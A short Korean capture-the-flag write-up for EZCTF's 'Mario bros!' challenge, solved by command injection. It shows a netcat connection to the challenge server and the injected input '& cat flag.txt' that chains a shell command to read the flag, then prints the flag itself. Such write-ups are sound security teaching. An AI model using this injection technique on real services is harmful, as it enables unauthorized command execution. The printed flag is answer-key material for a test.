본문 바로가기
CTF

[EZCTF] Mario bros!

by skyepodium 2022. 6. 6.

1.개요

커맨드 인젝션 문제

 

2. 풀이

1) 확인

nc 159.223.209.120 7777에 접속하면 Are you root?메시지가 나오고

입력하면 입력내용을 출력해줍니다.

Are you root?

yes
yes

2) exploit

&를 통해 그 다음 명령어가 있음을 알려주고 flag를 읽습니다. 

& cat flag.txt

 

3. flag

EZ-CTF{UNSECUR3_B4SH}

'CTF' 카테고리의 다른 글

[HSCTF 9] gallery  (0) 2022.06.06
[EZCTF] Save peach  (0) 2022.06.06
[b01lers CTF] gambler_overflow  (0) 2022.06.06
[b01lers CTF] gambler baby  (0) 2022.06.06
[b01lers CTF] I Love Java  (0) 2022.06.06